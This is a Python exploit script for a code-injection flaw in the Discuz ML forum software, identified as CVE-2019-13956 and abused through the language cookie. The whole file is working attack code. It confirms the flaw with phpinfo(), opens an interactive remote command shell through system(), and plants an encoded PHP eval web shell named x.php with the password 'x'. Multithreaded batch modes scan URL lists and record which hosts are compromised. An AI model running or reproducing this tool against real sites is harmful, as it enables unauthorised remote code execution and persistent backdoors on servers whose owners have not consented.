discuz_mlRce.py

#!/usr/bin/python
# coding:utf-8
# Author:Vibhuti Nath
# CVE-ID CVE-2019-13956
# POC https://www.esoln.net/blog/2019/06/14/discuzml-v-3-x-code-injection-vulnerability/
# Description:DISCUZ ML RCE in Language cookie
# Date:20190614


import requests
import optparse
import sys
import urllib3
import re
from bs4 import BeautifulSoup
import Queue
import threading
import os
import datetime



reload(sys)
sys.setdefaultencoding('utf-8')



lock = threading.Lock()
q0 = Queue.Queue()
threadList = []
global success_count
success_count = 0


total_count = 0


def get_setcookie_language_value(tgtUrl,timeout):

    urllib3.disable_warnings()
    tgtUrl = tgtUrl
    try:
        rsp = requests.get(tgtUrl, timeout=timeout, verify=False)
        rsp_setcookie = rsp.headers['Set-Cookie']
        # print rsp.text
        pattern = re.compile(r'(.*?)language=')
        language_pattern = pattern.findall(rsp_setcookie)
        setcookie_language = language_pattern[0].split(' ')[-1].strip() + 'language=en'
        return str(setcookie_language)

    except:
        print tgtUrl + ' get setcookie language value error!'
        return 'get-setcookie-language-value-error'


def dz_ml_rce_check(tgtUrl, setcookie_language_value, timeout):

    tgtUrl = tgtUrl
    check_payload = setcookie_language_value + '\'.phpinfo().\';'
    headers = {}

    headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";
    headers["Cookie"] = check_payload;

    check_rsp = requests.get(tgtUrl,headers=headers,timeout=timeout,verify=False)
    #print headers['Cookie']
    if check_rsp.status_code == 200:
        try:
            if (check_rsp.text.index('PHP Version')):
                print 'target is vulnerable!!!'

            else:
                soup = BeautifulSoup(check_rsp.text, 'lxml')
                if (soup.find('title')):
                    print 'target seem not vulnerable-' + 'return title: ' + str(soup.title.string) + '\n'
        except ValueError, e:
                print 'target seem not vulnerable-' + e.__repr__()
        except:
                print 'target seem not vulnerable-Unknown error.'
    else:
        print 'Target seem not vulnerable-status code: ' + str(check_rsp.status_code) + '\n'



def dz_ml_rce_cmdshell(tgtUrl, setcookie_language_value, timeout):

    tgtUrl = tgtUrl

    cmd_exp = '\'.system(\'{0}\').\';'

    cmd_test = 'echo zxc000'

    cmd_exp_test = setcookie_language_value + cmd_exp.format(cmd_test)

    headers = {}

    headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";
    headers["Cookie"] = cmd_exp_test;


    cmd_exp_rsp = requests.get(tgtUrl,headers=headers,timeout=timeout,verify=False)
    if cmd_exp_rsp.status_code == 200:
        if 'zxc000' in cmd_exp_rsp.text:
            print 'Get cmdshell success! type exit to exit.'

            while True:
                command = raw_input("cmd>>> ")
                if command == 'exit':
                    break
                cmd_exp_send = setcookie_language_value + cmd_exp.format(command)
                headers['Cookie'] = cmd_exp_send
                cmd_exp_rsp = requests.get(tgtUrl,headers=headers,timeout=timeout,verify=False)
                cmdshell_result = cmd_exp_rsp.text[0:1000].split('<!DOCTYPE html')[0].strip()
                #cmdshell_result = cmdshell_pattern.findall(cmd_exp_rsp.text[0:100])
                print cmdshell_result
        else:
            print 'Get cmdshell seem failed-can not find zxc000.'
    else:
        print 'Get cmdshell seem failed-status code: ' + str(cmd_exp_rsp.status_code) + '\n'



def dz_ml_rce_getshell(tgtUrl, setcookie_language_value, timeout):
    getshell_exp = '\'.file_put_contents%28%27x.php%27%2Curldecode%28%27%253c%253fphp%2520@eval%28%2524_%25%35%30%25%34%66%25%35%33%25%35%34%255b%2522x%2522%255d%29%253b%253f%253e%27%29%29.\';'
    getshell_exp_send = setcookie_language_value + getshell_exp

    headers = {}

    headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";

    headers['Cookie'] = getshell_exp_send

    filename = tgtUrl.split('/')[-1]

    getshell_rsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)
    # print headers['Cookie']
    if getshell_rsp.status_code == 200:
        getshell_rsp1 = requests.get(tgtUrl.split(filename)[0] + 'x.php', timeout=timeout, verify=False)
        #print tgtUrl.split('/')[-1]
        #print tgtUrl.split(filename)[0] + 'x.php'
        if (getshell_rsp1.status_code) == 200 and (getshell_rsp1.text == ""):
            print 'Getshell success!-shellPath:' + tgtUrl.split(filename)[0] + 'x.php'
        else:
            #soup = BeautifulSoup(getshell_rsp1.text, 'lxml')
            print 'Getshell failed!-rsp1 status code: ' + str(getshell_rsp1.status_code) + '\nrsp1 text: ' + getshell_rsp1.text[0:100]

    else:
        print 'Target seem not vulnerable-status code: ' + str(getshell_rsp.status_code) + '\n'



def dz_ml_rce_check_batch(timeout,f4success,f4fail):

    global total_count
    headers = {}

    headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";

    while(not q0.empty()):
        tgtUrl = q0.get()
        qcount = q0.qsize()
        print 'Checking: ' + tgtUrl + ' ---[' + str(total_count - qcount) + '/' + str(total_count) + ']'

        setcookie_language_value = get_setcookie_language_value(tgtUrl,timeout)
        if setcookie_language_value == 'get-setcookie-language-value-error':
            lock.acquire()
            f4fail.write(tgtUrl + ': ' + 'get setcookie language value error' + '\n')
            lock.release()
            continue

        check_payload = str(setcookie_language_value) + '\'.phpinfo().\';'
        headers["Cookie"] = check_payload;

        try:
            check_batch_rsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)

        except requests.exceptions.Timeout:
            #print tgtUrl + ' Checked failed! Error: Timeout'
            lock.acquire()
            f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: Timeout' + '\n')
            lock.release()
            continue

        except requests.exceptions.ConnectionError:
            #print tgtUrl + ' Checked failed! Error: ConnectionError'
            lock.acquire()
            f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: ConnectionError' + '\n')
            lock.release()
            continue

        except:
            #print tgtUrl + ' Checked failed! Error: Unknown error'
            lock.acquire()
            f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: Unknown error' + '\n')
            lock.release()
            continue

        if check_batch_rsp.status_code == 200:
            try:
                if (check_batch_rsp.text.index('PHP Version')):
                    print tgtUrl + ' is vulnerable!!!'
                    lock.acquire()
                    f4success.write(tgtUrl+'\n')
                    lock.release()
                    global success_count
                    success_count = success_count + 1

                else:
                    lock.acquire()
                    f4fail.write(tgtUrl + ': ' + 'Checked failed!' + '\n')
                    lock.release()
            except ValueError, e:
                #print tgtUrl + ' seem not vulnerable-' + e.__repr__()
                lock.acquire()
                f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: ' + e.__repr__() + '\n')
                lock.release()
                continue
            except:
                #print tgtUrl + ' seem not vulnerable-Unknown error.'
                lock.acquire()
                f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: Unknown error.'+'\n')
                lock.release()
                continue
        else:
            #print tgtUrl + ' seem not vulnerable-status code: ' + str(check_batch_rsp.status_code) + '\n'
            lock.acquire()
            f4fail.write(tgtUrl + ' Checked failed! Error: '+ str(check_batch_rsp.status_code) + '\n')
            lock.release()

def dz_ml_rce_getshell_batch(timeout,f4success,f4fail):


    headers = {}

    headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";

    global total_count
    while(not q0.empty()):
        tgtUrl = q0.get()
        qcount = q0.qsize()
        print 'Checking: ' + tgtUrl + ' ---[' + str(total_count - qcount) + '/' + str(total_count) + ']'

        setcookie_language_value = get_setcookie_language_value(tgtUrl,timeout)
        if setcookie_language_value == 'get-setcookie-language-value-error':
            lock.acquire()
            f4fail.write(tgtUrl + ': ' + 'get setcookie language value error' + '\n')
            lock.release()
            continue


        getshell_exp = '\'.file_put_contents%28%27x.php%27%2Curldecode%28%27%253c%253fphp%2520@eval%28%2524_%25%35%30%25%34%66%25%35%33%25%35%34%255b%2522x%2522%255d%29%253b%253f%253e%27%29%29.\';'
        getshell_exp_send = setcookie_language_value + getshell_exp
        headers["Cookie"] = getshell_exp_send

        try:
            getshell_batch_rsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)

        except requests.exceptions.Timeout:
            #print tgtUrl + ' Checked failed! Error: Timeout'
            lock.acquire()
            f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: Timeout' + '\n')
            lock.release()
            continue

        except requests.exceptions.ConnectionError:
            #print tgtUrl + ' Checked failed! Error: ConnectionError'
            lock.acquire()
            f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: ConnectionError' + '\n')
            lock.release()
            continue

        except:
            #print tgtUrl + ' Checked failed! Error: Unknown error'
            lock.acquire()
            f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: Unknown error' + '\n')
            lock.release()
            continue

        if getshell_batch_rsp.status_code == 200:
            filename = tgtUrl.split('/')[-1]
            getshell_batch_rsp1 = requests.get(tgtUrl.split(filename)[0] + 'x.php', timeout=timeout, verify=False)

            if (getshell_batch_rsp1.status_code) == 200 and (getshell_batch_rsp1.text == ""):
                print 'Getshell success!-shellPath:' + tgtUrl.split(filename)[0] + 'x.php'
                lock.acquire()
                f4success.write(tgtUrl.split(filename)[0] + 'x.php' + '\n')
                lock.release()
                global success_count
                success_count = success_count + 1
            else:
                # soup = BeautifulSoup(getshell_rsp1.text, 'lxml')
                #print 'Getshell failed!-rsp1 status code: ' + str(getshell_batch_rsp1.status_code) + '\nrsp1 text: ' + getshell_batch_rsp1.text[0:100]
                lock.acquire()
                f4fail.write(tgtUrl + '-' + 'Getshell failed!-rsp1 status code: ' + str(getshell_batch_rsp1.status_code) + '\n')
                lock.release()

        else:
            #print tgtUrl + ' seem not vulnerable-status code: ' + str(check_batch_rsp.status_code) + '\n'
            lock.acquire()
            f4fail.write(tgtUrl + ' Getshell failed! Error: '+ str(getshell_batch_rsp.status_code) + '\n')
            lock.release()



def main():
    parser = optparse.OptionParser('python %prog ' + '-h', version= '%prog v1.0')

    parser.add_option('-u', dest='tgtUrl', type='string', help='single target url')
    parser.add_option('-s', dest='timeout', type='int', default=7, help='timeout(seconds)')
    # parser.add_option('--check',dest='check',action='store_true',help='check url')
    parser.add_option('--getshell', dest='getshell', action='store_true', help='write a shell to target url-x.php,pwd is x')
    parser.add_option('--cmdshell', dest='cmdshell', action='store_true', help='cmd shell mode')

    parser.add_option('-f', dest='tgtUrlsPath', type ='string', help='urls filepath')
    parser.add_option('-t', dest='threads', type='int', default=5, help='the number of threads')

    (options, args) = parser.parse_args()

    getshell = options.getshell
    cmdshell = options.cmdshell
    timeout = options.timeout
    tgtUrl = options.tgtUrl


    global total_count

    if tgtUrl and (getshell is None and cmdshell is None):
        setcookie_language_value = get_setcookie_language_value(tgtUrl, timeout)
        if setcookie_language_value == 'get-setcookie-language-value-error':
            sys.exit()
        #print setcookie_language_value
        dz_ml_rce_check(tgtUrl, setcookie_language_value, timeout)
    if tgtUrl and cmdshell:
        setcookie_language_value = get_setcookie_language_value(tgtUrl, timeout)
        if setcookie_language_value == 'get-setcookie-language-value-error':
            sys.exit()
        dz_ml_rce_cmdshell(tgtUrl, setcookie_language_value, timeout)
    if tgtUrl and getshell:
        setcookie_language_value = get_setcookie_language_value(tgtUrl, timeout)
        if setcookie_language_value == 'get-setcookie-language-value-error':
            sys.exit()
        dz_ml_rce_getshell(tgtUrl, setcookie_language_value, timeout)

    if options.tgtUrlsPath and (getshell is None):
        tgtFilePath = options.tgtUrlsPath
        threads = options.threads
        nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
        os.mkdir('batch_result/' + str(nowtime))
        f4success = open('batch_result/' + str(nowtime) + '/' + 'success-checked.txt', 'w')
        f4fail = open('batch_result/' + str(nowtime) + '/' + 'failed-checked.txt', 'w')
        urlsFile = open(tgtFilePath)

        total_count = len(open(tgtFilePath, 'rU').readlines())

        print '===Total ' + str(total_count) + ' urls==='

        for urls in urlsFile:
            tgtUrls = urls.strip()
            q0.put(tgtUrls)
        for thread in range(threads):
            t = threading.Thread(target=dz_ml_rce_check_batch, args=(timeout, f4success, f4fail))
            t.start()
            threadList.append(t)
        for th in threadList:
            th.join()

        print '\n###Finished! [success/total]: ' + '[' + str(success_count) + '/' + str(total_count) + ']###'
        print 'Results were saved in ./batch_result/' + str(nowtime) + '/'
        f4success.close()
        f4fail.close()

    if options.tgtUrlsPath and getshell:
        tgtFilePath = options.tgtUrlsPath
        threads = options.threads
        nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
        os.mkdir('batch_result/' + str(nowtime))
        f4success = open('batch_result/' + str(nowtime) + '/' + 'success-getshell.txt', 'w')
        f4fail = open('batch_result/' + str(nowtime) + '/' + 'failed-getshell.txt', 'w')
        urlsFile = open(tgtFilePath)
        #global total_count
        total_count = len(open(tgtFilePath, 'rU').readlines())

        print '===Total ' + str(total_count) + ' urls==='

        for urls in urlsFile:
            tgtUrls = urls.strip()
            q0.put(tgtUrls)
        for thread in range(threads):
            t = threading.Thread(target=dz_ml_rce_getshell_batch, args=(timeout, f4success, f4fail))
            t.start()
            threadList.append(t)
        for th in threadList:
            th.join()

        print '\n###Finished! [success/total]: ' + '[' + str(success_count) + '/' + str(total_count) + ']###'
        print 'Results were saved in ./batch_result/' + str(nowtime) + '/'
        f4success.close()
        f4fail.close()




if __name__ == '__main__':

    main()